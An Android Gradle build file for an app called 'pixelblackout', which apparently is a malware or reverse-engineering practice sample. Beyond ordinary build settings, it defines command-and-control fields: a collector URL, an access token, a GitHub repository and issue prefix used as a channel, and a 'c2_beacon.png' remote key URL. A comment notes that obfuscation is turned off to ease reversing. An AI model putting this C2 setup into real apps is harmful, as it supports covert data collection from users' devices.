plugins {
    id 'com.android.application'
    id 'org.jetbrains.kotlin.android'
}

android {
    namespace 'com.example.pixelblackout'
    compileSdk 33

    defaultConfig {
        applicationId "com.example.pixelblackout"
        minSdk 31
        targetSdk 33
        versionCode 1
        versionName "1.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"

        externalNativeBuild {
            cmake {
                cppFlags "-std=c++17"
            }
        }

        buildConfigField "String", "C2_BASE", '"https://collector.pixelblackout.net"'
        buildConfigField "String", "C2_TOKEN", '"cf97f9d6-token"'
        buildConfigField "String", "GITHUB_OWNER", '"centralceeplusplus"'
        buildConfigField "String", "GITHUB_REPO", '"hehe_new"'
        buildConfigField "String", "GITHUB_ISSUE_PREFIX", '"PXC2"'
        // buildConfigField "String", "REMOTE_KEY_URL", '"https://raw.githubusercontent.com/centralceeplusplus/hehe/master/c2_beacon.png"'
        buildConfigField "String", "REMOTE_KEY_URL", '"https://raw.githubusercontent.com/centralceeplusplus/hehe_new/master/c2_beacon.png"'

        
    }

    signingConfigs {
        debug {
            storeFile file('debug.keystore')
            storePassword 'android'
            keyAlias 'androiddebugkey'
            keyPassword 'android'
        }
        release {
            storeFile file('debug.keystore')
            storePassword 'android'
            keyAlias 'androiddebugkey'
            keyPassword 'android'
        }
    }

    buildTypes {
        release {
            // Disable code shrinking/obfuscation to make reversing easier
            minifyEnabled false
            shrinkResources false
            // Keep proguardFiles reference for future, but it is ignored when minify is false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
            debuggable false
            signingConfig signingConfigs.release
        }
        debug {
            // Ensure debug is also not minified
            minifyEnabled false
            shrinkResources false
            signingConfig signingConfigs.debug
        }
    }
    compileOptions {
        sourceCompatibility JavaVersion.VERSION_11
        targetCompatibility JavaVersion.VERSION_11
    }
    kotlinOptions {
        jvmTarget = '11'
    }
    buildFeatures {
        dataBinding true
        viewBinding false
    }

    externalNativeBuild {
        cmake {
            path "src/main/cpp/CMakeLists.txt"
        }
    }
}

// Add JVM toolchain configuration
java {
    toolchain {
        languageVersion = JavaLanguageVersion.of(11)
    }
}

// Ensure all Kotlin compilation tasks use Java 11
tasks.withType(org.jetbrains.kotlin.gradle.dsl.KotlinCompile).configureEach {
    kotlinOptions {
        jvmTarget = "11"
    }
}

dependencies {
    implementation 'androidx.core:core-ktx:1.8.0'
    implementation 'androidx.appcompat:appcompat:1.4.1'
    implementation 'com.google.android.material:material:1.5.0'
    implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-core:1.6.4'
    implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-android:1.6.4'
    implementation 'androidx.work:work-runtime-ktx:2.8.1'

    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.1.3'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.4.0'
}
